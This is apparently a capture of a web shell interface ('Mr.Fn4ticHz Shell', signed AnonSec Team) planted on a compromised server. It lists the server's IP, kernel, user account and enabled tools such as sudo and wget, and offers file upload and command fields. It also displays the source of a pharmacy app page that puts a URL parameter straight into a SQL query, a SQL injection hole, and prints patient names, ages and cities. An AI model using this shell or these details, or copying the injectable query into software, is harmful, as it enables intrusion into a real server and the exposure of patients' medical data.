Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.137.160.57
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/Pharmacy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in/Pharmacy/mobilenm.php
<?php
session_start();
require_once('dbconnection.php');
require_once('../../DBManager.php');
require_once('../../LoginManager.php');
include'menu.php';
?>

     <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
                <table class="table table-bordered table-hover">
            
                  <tr>
            <th><strong>Patient Details</strong></th>
           <th><strong>Location</strong></th>    
            <th><strong>Select</strong></th>
        </tr>
      
            
<?php
$sql123 ="SELECT * FROM patient WHERE numbers='$_GET[numbers]' OR headnumber='$_GET[numbers]'";
$qsql123 = mysqli_query($con,$sql123);
while($rs = mysqli_fetch_array($qsql123))
{
            echo "
            <tr>  <td><b>UHID :</b>$rs[patientid]<br><b>Name : </b>$rs[patientname]<br><b>Gender : </b>$rs[gendor]<br><b>C/O :</b>$rs[HusbandName]<br><b>AGE :</b>$rs[dob]<br></td>
              					<td>&nbsp;$rs[city]</td>
					<td><a href='https://login.easenup.in/Pharmacy/patient_basic.php?patientid=$rs[patientid]' >Select</a></td>
          </tr>                   
          
          ";
}
?>    </table>

Anon7 - 2022
AnonSec Team